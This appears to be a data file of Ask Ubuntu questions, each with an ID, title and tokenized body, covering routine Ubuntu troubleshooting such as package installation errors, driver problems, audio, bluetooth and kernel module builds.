438366	error caused during installing groovenet simulator	when i install the groovenet simulator , i follow the steps to type make clean and make . after typing make , i got an error saying make : *** [ trafficlightmodel.o ] error 1 what goes wrong and how can i fix this error ? i need your help ! thanks !
438371	skype on ubuntu 13	i 'm not an ubuntu expert but when trying to install skype though terminal i receive this error message : stardust @ stardust : ~ $ sudo apt-get install skype [ sudo ] password for stardust : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package skype how can i fix this problem and finally install skype on my laptop ? thank you for your help !
438372	integrate dropbox and ubuntu one in the same menu	since dropbox and ubuntu one do the same thing , i would like to have their indicators in the same menu . is this possible ? i should say that i am on 13.10 .
438376	how to download all videos on a youtube channel ?	i always use youtube for getting information i need . what i want is a script or a command that grabs and downloads all videos from a given channel . note : i tried youtube-dl but with no success .
438377	canoscan lide 60 not working in ubuntu 13.10	after installing ubuntu 13.10 , my scanner not working , or not detected in xsane , please help me to connect my scanner .
438378	installing firefox add-on into live cd	i need to create a live ubuntu cd that will have a firefox add-on built-in . i have checked the following page : https : //help.ubuntu.com/community/livecdcustomization there are steps mentioned to change various aspects of bootable cd but there is no mention of how to install a firefox add-on into the new cd .
438383	help to build this expression using sed	i have a text file and i need to get rid off the entire information just before the = symbol in each line , for example : the line : file 1515 = foo.txt needs to look like this : =foo.txt so , i had this line using sed : sed s/= [ ^= ] *^// everyone.pls but it deletes all the characters after the = symbol . so , my question is : how can i delete the characters before = ? do n't forget that i do n't want to delete the = symbol , i need just before it .
438386	lenovo ideapad u430 touch battery not charging , tlp installed with no acpi_call module	i have recently purchased a lenovo ideapad u430 touch . i have successfully installed lubuntu 13.10 with kernel 3.11.0-18-generic . everything has been relatively painless . i 've installed tlp for better power management and recently i have noticed that my batter is no longer charging . using upower -i i get the same percentage ( currently 8 % ) and the energy-rate is 0 w , even though it says it 's charging . native-path : bat1 vendor : smp model : l12m4p62 power supply : yes updated : sun 23 mar 2014 10:05:27 pm pdt ( 2 seconds ago ) has history : yes has statistics : yes battery present : yes rechargeable : yes state : charging energy : 4.43 wh energy-empty : 0 wh energy-full : 51.72 wh energy-full-design : 52.54 wh energy-rate : 0 w voltage : 7.044 v percentage : 8 % capacity : 98.4393 % technology : lithium-ion when i run tlp-stat with the power chord plugged in i see ( among other things ) +++ system status tlp power save = enabled power source = ac and a little further down +++ thinkpad extended battery functions tp-smapi = inactive ( kernel module 'tp_smapi ' not installed ) tpacpi-bat = inactive ( kernel module 'acpi_call ' not installed ) +++ battery status /sys/class/power_supply/bat1/manufacturer = smp /sys/class/power_supply/bat1/model_name = l12m4p62 /sys/class/power_supply/bat1/cycle_count = ( not supported ) /sys/class/power_supply/bat1/energy_full_design = 52540 [ mwh ] /sys/class/power_supply/bat1/energy_full = 51720 [ mwh ] /sys/class/power_supply/bat1/energy_now = 4430 [ mwh ] /sys/class/power_supply/bat1/power_now = 0 [ mw ] /sys/class/power_supply/bat1/status = unknown now initially i installed tp-smapi-dkms and acpi-call-tools , but subsequently purged them since this is not a true thinkpad . things were working fine for the past couple of days after the purge , but now there is no change in the percentage . this has been the case for the past few hours . the fact that the /sys/class/power_supply/bat1/power_now is 0 [ mw ] and /sys/class/power_supply/bat1/status is unknown from tlp is making me wonder . one last thing . i have tried , at various times , using lxde 's power manager , which i believe is just the xfce4 power manager gui and actually uses upower on the backend , but i 'm not 100 % sure that is the only thing it uses . either way it reports the same 8 % . most recently , i came across something on an arch wiki here that suggested not installing any other power-management tools in addition to tlp , and that cpupower may even break p-state on the cpu . my questions are : does the lxde power-management use cpupower and did i break something by running it while tlp was active ? does anyone have any ideas as to why i am seeing the same 8 % reported from upower ? should i install acpi_call ?
438387	copying files from external drive	hi i have installed ubuntu 13.04 with single partition . now i need to copy files from my external drive . what is the possibilities for copying files .
438389	java filenotfoundexception in ubuntu 12.04 ?	i have ubuntu 12.04 where i have installed jdk 7 , jboss server as 7.1.1 and running my application successfully.the problem is in my java application i am editing a xml file at runtime to update the content of file . it is working fine in window but in ubuntu it is throwing filenotfoundexception . but i checked manually file is there . can you please help me . is it like you can change files at run time in ubuntu or some admin privileges . caused by : java.io.filenotfoundexception : /home/azureuser/ranveer/hopscotch/jboss-as-7.1.1.final/standalone/deployments/hop.ear/entre.war/config/datacon/daoconfig.xml ( no such file or directory ) 04:04:33,219 error [ stderr ] ( http -- 0.0.0.0-8080-5 ) at java.io.fileinputstream.open ( native method ) 04:04:33,219 error [ stderr ] ( http -- 0.0.0.0-8080-5 ) at java.io.fileinputstream. < init > ( fileinputstream.java:146 ) 04:04:33,220 error [ stderr ] ( http -- 0.0.0.0-8080-5 ) at java.io.fileinputstream. < init > ( fileinputstream.java:101 ) 04:04:33,220 error [ stderr ] ( http -- 0.0.0.0-8080-5 ) at sun.net.www.protocol.file.fileurlconnection.connect ( fileurlconnection.java:90 ) 04:04:33,220 error [ stderr ] ( http -- 0.0.0.0-8080-5 ) at sun.net.www.protocol.file.fileurlconnection.getinputstream ( fileurlconnection.java:188 ) 04:04:33,220 error [ stderr ] ( http -- 0.0.0.0-8080-5 ) at java.net.url.openstream ( url.java:1037 ) 04:04:33,221 error [ stderr ] ( http -- 0.0.0.0-8080-5 ) ... 118 more
438396	how to capture all visited urls on the command line ?	i like to get all urls i visit in the browser live captured on the command-line for piping them to another program . how would i be able to do this ? the format should be just one url per line , nothing else , no tabs , no spaces etc . this is what i have got so far . the tab removal is not working . i have seen a comment replying to someone ( at the very bottom ) who not had problems with piping it to grep that he should escape it . i not really understand this . sudo httpry -f -i eth0 -f host , request-uri | tr -d 't' also even if this works it will not work with https right ? is there another way to do this that includes https ? i am willing to use browser plugins for firefox and chromium if they exist . just want to send all visited urls to a script . maybe i can parse the browsers historys live and pipe that ?
438401	how to display the name of file which i am currently editing with vim on terminal title ?	i am editing multiple files located in the same folder , in multiple tabs , on a single terminal . pwd ( directory in which i am currently working ) is displayed on the top of the heading of the terminal , but not the name of the file i am editing . it gets confusing when working with multiple files in the same directory . how to display the name of the current file on the top of the terminal in addition to the pwd . i am running vim in a bash shell in gnome-terminal , on 12.04 lts .
438405	how can gimp 2.8 have two different icons together ?	in unity dash gimp 2.8.10 has a icon and uses a different one in launcher . gimp in dash gimp in launcher i searched for gimp in `` file system '' and got this . how can this be done while packaging other apps ?
438411	google-chrome unity launcher with dpkg-divert	when i login as root , i can not run google-chrome , because it has a built-in root-user check . i can run google-chrome by adding -- user-data-dir /root/.config/google-chrome/ to the start script in /usr/bin/google-chrome . exec -a `` $ 0 '' `` $ here/chrome '' `` $ @ '' -- user-data-dir /root/.config/google-chrome/ the problem is , every update overwrites /usr/bin/google-chrome with the vanilla version , and so i always have to re-add this directive again ... i found a solution with dpkg-divert : dpkg-divert -- divert /usr/bin/google-chrome.new -- rename /usr/bin/google-chrome now , each new /usr/bin/google-chrome file gets copied to /usr/bin/google-chrome.new , and that leaves my original file intact , so i can always start google-chrome from command line immediately even when i have updated/upgraded the package . this works great , as long as i start google-chrome from the gnome-terminal command line ( it did n't work after updates before the diversion ) . when i start it with the unity launcher , then i get `` can not run google-chrome as root '' . now , i assume unity is somehow using the google-chrome.new file . why that ? how does that happen ? where can i see what unity does ? i was under the impression that it simply executes /usr/bin/google-chrome , but obviously , it 's not that simple .
438413	workspace switch graphical bug	i 'm having this graphical bug in the workspace switcher . you can see it on the entire right side in this image . i 'm not sure how to fix it .
438417	can not ping to bond0 in ubuntu12.04 in vmware	i have been aggregated eth0 and eth1 to bond0 , but i can not ping to bond0 from the base os which is fedora-18 to the ubuntu12.04 in vmware , or also can not ping from the another vmware os which are xp and another ubuntu12.04 . please guide me . thank you very much .
438418	touchpad right click 2 fingers problem	i am using ubuntu 13.10 in my laptop and this problem annoy me everytime . i had this problem with linux mint too . the problem is i cant use right click when my finger on the touchpad when i use the right click it act as a left click and start to select . but when i use it without touching the pad and just clicking it work . i tried to install the new synaptics driver but same thing . i tried this in 51-clickpad.conf : section `` inputclass '' identifier `` default clickpad buttons '' matchdriver `` synaptics '' option `` softbuttonareas '' `` 50 % 0 82 % 0 0 0 0 0 '' # next 3 items added just for the hp mini to better control the clickpad option `` lockeddrags '' `` 1 '' option `` bottomedge '' `` 4000 '' option `` areabottomedge '' `` 4445 '' endsection and it became worst , the system didnt start . i had to delete it
438420	how ubuntu kernel ( 3.12 ) did not trigger realtek 8169 issue ?	i have a customized vanilla 3.12.14 kernel which could not work with r8169 ethernet card . watchdog will through timeout on netdev error . this error was reported on multiple distros , on 3.12 kernel . but none listed a solution . well , there is no issue on ubuntu kernel ( from kernel.ubuntu.com ) . i am wondering which patch fixed this ?
438421	copy/paste with mouse does n't work anymore	for some times now , i 've lost the copy/paste function with the mouse ( 2e button click ) , i ca n't only copy paste with keyboard now ? does anybody knows how to re-enable it ? ?
438422	input/output error while executing cp command	i 'm new in linux i 'm trying to follow a steps for install ros on udoo and i have the next problem . when i try to download and unpack ubuntu 13.04 i have the next problems : the command line is : babil0nia @ ubuntu : /mnt/sdcard $ wget http : //cdimage.ubuntu.com/ubuntu-core/releases/13.04/release/ubuntu-core-13.04-core-armhf.tar.gz tar xzf ubuntu-core-13.04-core-armhf.tar.gz and returns : -- 2014-03-24 01:05:08 -- http : //cdimage.ubuntu.com/ubuntu-core/releases/13.04/release/ubuntu-core-13.04-core-armhf.tar.gz resolving cdimage.ubuntu.com ( cdimage.ubuntu.com ) ... 91.189.92.164 , 2001:67c:1360:8c01 : :20 connecting to cdimage.ubuntu.com ( cdimage.ubuntu.com ) |91.189.92.164|:80 ... connected . http request sent , awaiting response ... 200 ok length : 35939978 ( 34m ) [ application/x-gzip ] ubuntu-core-13.04-core-armhf.tar.gz : input/output error can not write to `ubuntu-core-13.04-core-armhf.tar.gz ' ( input/output error ) . -- 2014-03-24 01:05:11 -- http : //tar/ resolving tar ( tar ) ... failed : name or service not known . wget : unable to resolve host address `tar' -- 2014-03-24 01:05:21 -- http : //xzf/ resolving xzf ( xzf ) ... failed : name or service not known . wget : unable to resolve host address `xzf' -- 2014-03-24 01:05:31 -- http : //ubuntu-core-13.04-core-armhf.tar.gz/ resolving ubuntu-core-13.04-core-armhf.tar.gz ( ubuntu-core-13.04-core-armhf.tar.gz ) ... failed : name or service not known . wget : unable to resolve host address `ubuntu-core-13.04-core-armhf.tar.gz' babil0nia @ ubuntu : /mnt/sdcard $ cd babil0nia @ ubuntu : ~ $ cp u u-boot-q.imx ubuntu-core-13.04-core-i386.tar.gz ubuntu-core-13.04-core-armhf.tar.gz uimage babil0nia @ ubuntu : ~ $ cp u u-boot-q.imx ubuntu-core-13.04-core-i386.tar.gz ubuntu-core-13.04-core-armhf.tar.gz uimage babil0nia @ ubuntu : ~ $ cp ubuntu-core-13.04-core-armhf.tar.gz /mnt/sdcard/ cp : can not create regular file `/mnt/sdcard/ubuntu-core-13.04-core-armhf.tar.gz ' : input/output error so i download the ubuntu 13.04 and tried to copy in the /mnt/sdcard/ folder but i have the next problem : babil0nia @ ubuntu : ~ $ cp ubuntu-core-13.04-core-armhf.tar.gz /mnt/sdcard/ cp : can not create regular file `/mnt/sdcard/ubuntu-core-13.04-core-armhf.tar.gz ' : input/output error please help what can i do ? first i create an ext3 partion on the sd card whit gparted then flash u-boot on the boot sector : dd if=u-boot-q.imx of=/dev/sdb1 bs=512 seek=2 skip=2 when i tried flash u-boot i need the command sudo chmod 777 for /dev/sd1 then mount the sd card to a local folder sudo mkdir -p /mnt/sdcard sudo mount /dev/sdd1 /mnt/sdcard
438423	hadoop job tracker and task tracker not running on ubuntu 13.10	i have installed hadoop .20 on my ubuntu 13.10 machine . when i do start-all.sh only name node , data node and secondary node process starts , job tracker and task tracker does n't show . i have used the installation instructions from here . following is the log for job tracker 2014-03-24 12:46:42,860 fatal org.apache.hadoop.mapred.jobtracker : java.lang.runtimeexception : not a host : port pair : local at org.apache.hadoop.net.netutils.createsocketaddr ( netutils.java:145 ) at org.apache.hadoop.net.netutils.createsocketaddr ( netutils.java:129 ) at org.apache.hadoop.mapred.jobtracker.getaddress ( jobtracker.java:2434 ) at org.apache.hadoop.mapred.jobtracker. < init > ( jobtracker.java:2057 ) at org.apache.hadoop.mapred.jobtracker. < init > ( jobtracker.java:2050 ) at org.apache.hadoop.mapred.jobtracker.starttracker ( jobtracker.java:296 ) at org.apache.hadoop.mapred.jobtracker.starttracker ( jobtracker.java:288 ) at org.apache.hadoop.mapred.jobtracker.main ( jobtracker.java:4799 )
438424	downloading music from ubuntu one	i purchased some music which is now stored on ubuntu one . when i try to listen to it , it `` stutters '' ! so i would like to download these files to my hd to get better play quality but can find no mechanism to achieve this . how do i do this , i 'm sure it should be relatively simple , but i ca n't find how .
438425	dell xps 13 ubuntu 13.10 built-in display not working	i have a dell xps 13 which came pre-installed with windows 8 . i installed ubuntu 12.10 and upgraded to 13.10 recently . after the upgrade , the built-in display is always a blank screen , while when connected to the external monitor , everything displays properly there . i am new to ubuntu and would like any solutions to resolve this problem . thank you very much !
438428	is there a command to scan my network and check the conflict ips	it 's hard job to find the duplicate ip when this happens . you know you have then to search all network ips to check the duplicate . so is there a command line or a script to do that for me ?
438433	gnome tweak tool	i have just installed gnome tweak tool by typing this command in the terminal : sudo apt-get install gnome-tweak-tool after installing i have applied few tweaks but after rebooting my ubuntu 13.10 got error at the time of startup , and then my screen desktop become blank . even changing desktop images does n't work for me . and my system gets freezes many times . and my mouse right properties also does n't show up . please help me either to learn how to uninstall it or fix it . i am a newbie here .
438434	using for loop to create a flexible radio list in a dialog box from a shell script	i want to create a little program using dialog to play logfiles created with script . the problem is that i ca n't get a dynamic radio list that automatically adds a row if a new logfile is created . so i know that i `` just '' need to use a if loop like # for i in ... etc . with a counter that counts the logfiles but i ca n't get it to work . so this is what i have right now : # ! /bin/bash counter=1 for i in $ ( ls /mnt/home/ $ user/shell_logs/*.log ) ; do echo $ i $ counter let counter=counter+1 done i just need to get this working with my radiolist : # ! /bin/bash counter=1 for i in $ ( ls /mnt/home/ $ user/shell_logs/*.log ) ; do let counter=counter+1 done dialog -- backtitle `` radiolist '' \ -- radiolist `` test '' 0 0 $ counter \ $ counter $ i < -- this is the main problem
438440	streaming with ffmpeg : splashscreen ?	i 've been experimenting with streaming via ffmpeg . i love how powerful it is ! currently i have it set up so that it streams my screen and adds an overlay for my webcam . though , there is one thing that i 'd like to be able to do that i just ca n't quite figure out : throw up an on-demand splash screen . perhaps this would be better explained via example . say you 're streaming a game or something via twitch for a long while . then , you have to step away . you could just walk away , or throw up a `` be right back ! '' splash screen or something , perhaps with a little music ( i 've got that part figured out thanks to the awesomeness of pulseaudio ) i figured the best way to accomplish this was via a second overlay that overlays the screen/webcam overlay . i attempted to add a third input akin to this : ffmpeg -f v4l2 -i /dev/video0 -f xllgrab -i :0.0+738,0 -i ~/splashscreen.png -loop 1 -fliter_complex `` [ 0:1 ] [ 0:0 ] overlay=0:0 [ out ] ; [ out ] [ 2:0 ] overlay=0:0 [ final ] '' -f flv ~/videos/test.flv ( requires a newer version of ffmpeg than is in the saucy repos ) and it worked , as the splash screen was transparent . i thought i 'd do something clever and swap in a non-transparent image when i needed the splash screen but either ffmpeg caches the looped image or it ignores it when it suddenly ca n't find the file for a brief instance . the second way i thought of was perhaps using a named pipe and using another ffmpeg instance to pipe in they overlay splash screen when i need it , but from what i 've read , if ffmpeg does n't find any data in the pipe it will not continue processing the rest of the video , instead it will only put out frames when it can pull from all the input sources . if there are any ffmpeg gurus out there , i 'd love to hear some ideas !
438443	ca n't add applications using sudo apt-get and unofficial ppa : unable to lock directory	my terminal shows this error . i ca n't add any applications . please help someone ashwin @ ash : ~ $ sudo add-apt-repository ppa : tualatrix/ppa [ sudo ] password for ashwin : the official ubuntu tweak stable repository more info : https : //launchpad.net/~tualatrix/+archive/ppa press [ enter ] to continue or ctrl-c to cancel adding it gpg : keyring `/tmp/tmpwj1dey/secring.gpg ' created gpg : keyring `/tmp/tmpwj1dey/pubring.gpg ' created gpg : requesting key 0624a220 from hkp server keyserver.ubuntu.com gpg : /tmp/tmpwj1dey/trustdb.gpg : trustdb created gpg : key 0624a220 : public key `` launchpad ppa for tualatrix '' imported gpg : no ultimately trusted keys found gpg : total number processed : 1 gpg : imported : 1 ( rsa : 1 ) ok ashwin @ ash : ~ $ sudo apt-get update e : could not get lock /var/lib/apt/lists/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/lib/apt/lists/
438445	how to open a browser when the textedit : :onlinkactivated signal is received	i 'd like to open a browser window to display the url received by a textedit onlinkactivated signal . is it possible to perform such call from the qml application ?
438451	`` could not open display ` ( null ) ' '' error . how can i fix this ?	i 'm trying to run an appliaction , but when i run it i get a could not open display ` ( null ' ) . error . why is this ? specifically i was trying to run scratch ( which i installed via aws ) : root @ ip-10-251-56-90 : /usr/bin # ./scratch executing : /usr/lib/squeak/4.4.7-2357/squeakvm -encoding utf-8 -vm-display-x11 -xshm -plugins /usr/lib/scratch/plugins/ : /usr/lib/squeak/4.4.7-2357/ -vm-sound-alsa /usr/share/scratch/scratch.image could not open display ` ( null ) ' .
438453	not able to view a file using crontab	cat filename.txt displays the contents of the text file in the same terminal the command is executed . but in crontab when i type * 14 24 3 1 cat filename.txt nothing gets displayed at the time specified .
438454	can not edit /host files on vfat windows partition	i have just installed ubuntu 12.04 through wubi and i do not know how to change the permissions so that it lets me use the windows partition , for it says i 'm not the owner . this is a vfat partition . i have tried editing the settings with mount manager and storage device manager , all to no avail .
438455	problems installing ubuntu 12.04 alongside xp	i have ben trying to install ubuntu for the last few days but somehow it work . during the installation i keep getting the messags : busybox v1.18.5 ( ubuntu 1:1.18.5-1ubuntu 4.1 ) built in shell ( ash ) enter `` help '' for list of built in commands ( initramfs ) seeing that i 'm not a whiz kid ... i really do n't know what to do with this information . hope you can help me ! !
438457	apt-get install libglapi-mesa error	i 'm struggling with ubuntu for almost 3 months now . and it never fails to drive me crazy . i 'm using ubuntu for compiling android kernels for beaglebone black . i installed ubuntu into a separate physical harddrive . after i finished my work with it , i disconnected that harddrive and did n't use it until today . this morning i reconnect my ubuntu harddrive and tried to boot ubuntu . and suprise suprise . it did n't boot up . since i did n't care the files in harddrive , i formated it and installed a brand new ubuntu . now i am following the exact steps i did before for kernel compiling . i need several packages to install for compiling an android kernel . one of them is `` libglapi-mesa '' . i am using following shell command to install it : apt-get install libglapi-mesa but it acts differently and does n't install the package . here is the response of shell : reading package lists ... done building dependency tree reading state information ... done note , selecting 'libglapi-mesa-lts-saucy ' instead of 'libglapi-mesa' libglapi-mesa-lts-saucy is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded i 've used the same ubuntu 12.04.4 setup . and in the past it was installing the package i want , now it does n't install it . it says `` selecting 'libglapi-mesa-lts-saucy ' '' and `` libglapi-mesa-lts-saucy is already the newest version . '' but i do n't want these packages because when i try to run sudo apt-get install git-core gnupg flex bison gperf build-essential \ zip curl libc6-dev libncurses5-dev : i386 x11proto-core-dev \ libx11-dev : i386 libreadline6-dev : i386 libgl1-mesa-glx : i386 \ libgl1-mesa-dev g++-multilib mingw32 openjdk-6-jdk tofrodos \ python-markdown libxml2-utils xsltproc zlib1g-dev : i386 \ minicom tftpd uboot-mkimage expect libgl1-mesa-dri it fails , because it needs 'libglapi-mesa ' .
438458	alt + digit in terminal : what kind of feature is it ?	in my ubuntu 12.04 terminal one can press alt + # which leads to the repeation of the following character # -times . simple question : for what is it good for ? is it some fancy feature one can use for some purpose ? greetz , tik0
438463	how to connect to mysql server in another system from ubuntu	i am using ubuntu , and am programming in android . so in my application i need to connect to mysql database which is in another system . when i searched , i foud that wamp server is need , wanp only works in windows rigth ? so what can i do ? please help
438467	12.04 no sound and alsamixer problem	12.04 no sound.i installed 12.04 three times and tried forum answer but not fixed for my problem . i change alsamixer setting but after restart alsamixer settings returns back to old settings . how can i solve this problem ?
438472	fast move window in ubuntu with keyboard	yes i know about alt+f7 shortcut , but moving with arrows is too slow . also it used to work ( fast move to the left/right ) with shift-left/right on previous lts 10.04 , but currently on 12.04 does n't seem to work . shortcut within a shortcut.. any suggestions ? sorry for not capitalizing , but have some issues with my hands ( easier to type the better ) .
438474	audio does not work in upstart job	i 'm trying to run the gmediarender upnp media renderer as an upstart job . when i run it from the command line as myself , everything works fine . when it runs as an upstart job , i get error messages in /var/log/upstart/gmediarender and no sound . the error messages are different depending on which audiosink option i use . if i use the -- gstout-audiosink=pulsesink option the error messages look like : assertion 'm ' failed at pulse/thread-mainloop.c:166 , function pa_threaded_mainloop_lock ( ) . aborting . without this option the messages look like : al lib : alsa_open_playback : could not open playback device 'default ' : connection refused error [ 2014-03-23 20:57:12.621940 | gstreamer ] playsink2 : error : the autoaudiosink element is not working . ( debug : gstplaysink.c ( 1906 ) : gen_audio_chain ( ) : /gstplaybin2 : play/gstplaysink : playsink2 ) can not connect to server socket err = no such file or directory can not connect to server request channel jack server is not running or can not be started regardless of the sink i use and whether it is an upstart job or not , i get these messages : ( gmediarender:1146 ) : gstreamer-critical ** : gst_pad_new_from_template : assertion 'gst_is_pad_template ( templ ) ' failed ( gmediarender:1146 ) : gstreamer-critical ** : gst_pad_template_get_caps : assertion 'gst_is_pad_template ( templ ) ' failed ( gmediarender:1146 ) : gstreamer-critical ** : gst_pad_set_caps : assertion 'gst_is_pad ( pad ) ' failed ( gmediarender:1146 ) : gstreamer-critical ** : gst_element_add_pad : assertion 'gst_is_pad ( pad ) ' failed i 'm guessing my pulseaudio set up could be better but i wonder what upstart is doing differently from the command line . seeing as it works from the command line , i do n't see why it ca n't work from upstart . i 've tried using the setuid and setgid stanzas in the upstart configuration : # gmediarender - gmediarender job file description `` upnp renderer '' author `` john reid < john ... reid @ netscape.net > '' # stanzas # # stanzas control when and how a process is started and stopped # see a list of stanzas here : http : //upstart.ubuntu.com/wiki/stanzas # respawn # when to start the service start on runlevel [ 2345 ] # when to stop the service stop on runlevel [ 016 ] # automatically restart process if crashed respawn # expect gmediarender to run as a daemon # expect daemon # run as john setuid john setgid pulse # start after pulseaudio # start on started pulseaudio result=ok # start the process exec /usr/local/bin/gmediarender -f htpc -u 099519151638c684ee01135a43d427ea # exec /usr/local/bin/gmediarender -f htpc -u 099519151638c684ee01135a43d427ea -- gstout-audiosink=pulsesink lsb_release -a gives : no lsb modules are available . distributor id : ubuntu description : ubuntu 13.10 release : 13.10 codename : saucy the box is a mythbuntu set up . i get these messages in syslog : mar 23 20:57:12 htpc pulseaudio [ 4224 ] : [ pulseaudio ] main.c : module load failed . mar 23 20:57:12 htpc pulseaudio [ 4224 ] : [ pulseaudio ] main.c : failed to initialize daemon . mar 23 20:57:12 htpc pulseaudio [ 4221 ] : [ pulseaudio ] main.c : daemon startup failed . mar 23 21:03:38 htpc pulseaudio [ 4430 ] : [ pulseaudio ] socket-server.c : bind ( ) : address already in use mar 23 21:03:38 htpc pulseaudio [ 4430 ] : [ pulseaudio ] module.c : failed to load module `` module-esound-protocol-unix '' ( argument : `` '' ) : initialization failed . any help would be appreciated !
438479	is bluez ( bluetoothd ) not sending dbus method_call selectconfiguration upon connection ? if so , how do i catch it ?	update : not solved yet , but part of a solution . see below . i am attempting to connect my ipod or other smart device to my laptop ( kubuntu 13.10 ) via bluetooth and stream a2dp-encoded music to a bluetooth speaker . never mind why i do n't connect them directly . i had a lot of trouble getting the devices to actually pair then connect at the same time , but now i 'm able to do that . there are a million posts out there that describe different ways to connect bt headsets by changing .asoundrc , /etc/bluetooth/audio.conf , and loading a loopback module through pulseaudio 's controller . however , i could never get pulseaudio to consistently load the sources and sinks , so i scratched that idea and started following this great post by james b : bluez a2dp audiosink for alsa i got the code compiled . it uses the ( newer ? ) dbus api for bluez . following his instructions , i was able to pipe music into the a2dp `` server '' or out of it , but there is no sound . in the code , he waits for two dbus method_calls , selectconfiguration and setconfiguration in order to obtain the `` transport '' , which i think is a handle or file descriptor that describes where the audio should go to/from . however , the handlers for these events are never called . i set up dbus-monitor to listen on the system bus for these calls using this guide debuggingdbus . however , the method calls do n't show . then again , i tried listening to any method calls on the system bus and there are some that do n't show in dbus-monitor that i know are being called . ( i.e . registerendpoint ) i see signals from org.bluez , but no method calls . when running bluetoothd in verbose mode i get something like this when i connect my device : bluetoothd [ 12118 ] : audio/a2dp.c : setup_ref ( ) 0x7f9e8ffbdac0 : ref=2 bluetoothd [ 12118 ] : audio/avdtp.c : avdtp_set_configuration ( ) 0x7f9e8ffd03f0 : int_seid=1 , acp_seid=1 bluetoothd [ 12118 ] : audio/a2dp.c : setup_unref ( ) 0x7f9e8ffbdac0 : ref=1 bluetoothd [ 12118 ] : audio/avdtp.c : session_cb ( ) bluetoothd [ 12118 ] : audio/avdtp.c : avdtp_parse_resp ( ) set_configuration request succeeded bluetoothd [ 12118 ] : audio/a2dp.c : setconf_cfm ( ) source 0x7f9e8ffa4600 : set_configuration_cfm bluetoothd [ 12118 ] : audio/avdtp.c : avdtp_sep_set_state ( ) stream state changed : idle - > configured bluetoothd [ 12118 ] : audio/avdtp.c : session_cb ( ) bluetoothd [ 12118 ] : audio/avdtp.c : avdtp_parse_resp ( ) open request succeeded but on another post i saw that someone had this : bluetoothd [ 8315 ] : audio/a2dp.c : setup_ref ( ) 0x7f1f8300b000 : ref=2 < br/ > bluetoothd [ 8315 ] : audio/avdtp.c : avdtp_set_configuration ( ) 0x7f1f83012250 : int_seid=2 , acp_seid=1 bluetoothd [ 8315 ] : audio/a2dp.c : setup_unref ( ) 0x7f1f8300b000 : ref=1 bluetoothd [ 8315 ] : audio/avdtp.c : session_cb ( ) bluetoothd [ 8315 ] : audio/avdtp.c : avdtp_parse_resp ( ) set_configuration request succeeded bluetoothd [ 8315 ] : audio/a2dp.c : setconf_cfm ( ) sink 0x7f1f82fc3210 : set_configuration_cfm ** bluetoothd [ 8315 ] : audio/media.c : media_endpoint_async_call ( ) calling setconfiguration : name = :1.65 path = /mediaendpoint/a2dpsink ** bluetoothd [ 8315 ] : audio/avdtp.c : avdtp_sep_set_state ( ) stream state changed : idle - > configured bluetoothd [ 8315 ] : audio/avdtp.c : session_cb ( ) bluetoothd [ 8315 ] : audio/avdtp.c : avdtp_parse_resp ( ) open request succeeded at this point i have two theories : bluez is n't sending this to the bus i 'm watching when my device is connected . i 'm not watching correctly ( do method_calls also need to be added with dbus_bus_add_match ( ) ? ) i find it hard to believe the second one , since james b 's code worked for him and i did n't modify it . i 'm using bluez version 4.101 . ( same as he , i think ) it 's hard to find the exact conditions under which bluez calls these methods . my syslog says something like this when i start the program : bluetoothd [ 8519 ] : endpoint registered : sender=:1.166 path=/mediaendpoint/a2dpsource and unregisters as well when the program exits . i ca n't think of other details to add at the moment , but i 'm happy to if i have n't provided enough . thanks in advance update : a little embarrassing , but i racked my brain today about why a linux system would n't get a file handle ... hmmm ... so i appended sudo to the program call ( james b 's a2dp-alsa program ) and it worked . at least for the input device . still nothing for the output ( bt speaker ) , but i 'll try to figure that out soon and post the result here .
438481	error ! bad return status for module build on kernel : 3.8.0-37-generic ( x86_64 )	after updating some packages in my machine ( using aptitude ) , i got the following error : error ! bad return status for module build on kernel : 3.8.0-37-generic ( x86_64 ) consult /var/lib/dkms/openafs/1.6.1/build/make.log for more information . just after prompting run-parts : executing /etc/kernel/header_postinst.d/dkms 3.8.0-37-generic /boot/vmlinuz-3.8.0-37-generic i have consulted the log file . the first error i 've noticed there was at line 458 , and this was it : /var/lib/dkms/openafs/1.6.1/build/src/afs/afs_osi.h:14:21 : fatal error : h/param.h : no such file or directory this error has caused the compilation to terminate and the script to exit with error code 2 . other than that , update went ok . in addition , inside aptitude i do n't see any leftovers of packages to be installed ( it says `` no packages are scheduled to be installed , removed , or upgraded '' ) . so my question is this : should i worry ? did anything really went wrong with the update ? if so : what should i do to fix it ? edit : output of uname -srvmpio : linux 3.8.0-36-generic # 52~precise1-ubuntu smp mon feb 3 21:54:46 utc 2014 x86_64 x86_64 x86_64 gnu/linux this is ubuntu 12.04.4 lts . update i thought that installing linux-generic has solved the problem . it looked like that on the first place , but after more than a week , having linux-generic still installed , i got the following error on system update , which is almost the same as the old one : error ! bad return status for module build on kernel : 3.8.0-38-generic ( x86_64 ) consult /var/lib/dkms/openafs/1.6.1/build/make.log for more information . again , line 458 has showed this error : /var/lib/dkms/openafs/1.6.1/build/src/afs/afs_osi.h:14:21 : fatal error : h/param.h : no such file or directory so i tend to believe the problem is somewhere else .
438482	added new user does not have destop	ubuntu server 13.10 i installed the ubuntu desktop ( lame i know ) and had to add a second user . when i log in as that user the screen is blank . no desktop and worst of all no terminal prompt . when i look into the new users home directory all of the proper sub-directories are there .
438487	how to restore intel hd gpu hardware detection after removing failed nvidia driver	i am running ubuntu13.10 - i have a dell latitiude e6530 laptop , it has an intel cpu+gpu and also an nvidia nvs 5200m gpu . after having a perfectly fine system running very nicely under the intel hd built-in graphics i foolishly attempted the horror of installing the nvidia drivers . cut a long story short , i got nowhere and have failed to get my system to return to using the intel integrated graphics . i 've tried the various obvious tricks ( i 've read a lot of forum posts ! ! ) but i can not get the intel gpu drivers/hardware detection to come back . i am currently running under 'nouveau ' against the nvidia card , which is v.v.slow but at least i can see my screen to type this : ( can anyone help me restore the original intel graphics ? ? the really odd thing is that it looks like the intel gpu has vanished from the available hardware list ? here is the output from pertinent things : uname -a linux kevlinux 3.11.0-19-generic # 33-ubuntu smp tue mar 11 18:48:34 utc 2014 x86_64 x86_64 x86_64 gnu/linux dpkg -l | grep intel | awk ' { print $ 2 } ' intel-gpu-tools intel-linux-graphics-installer libdrm-intel1 : amd64 libdrm-intel1 : i386 xserver-xorg-video-intel lspci |grep vga 01:00.0 vga compatible controller : nvidia corporation gf108glm [ nvs 5200m ] ( rev a1 ) lspci -k|grep intel 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:01.0 pci 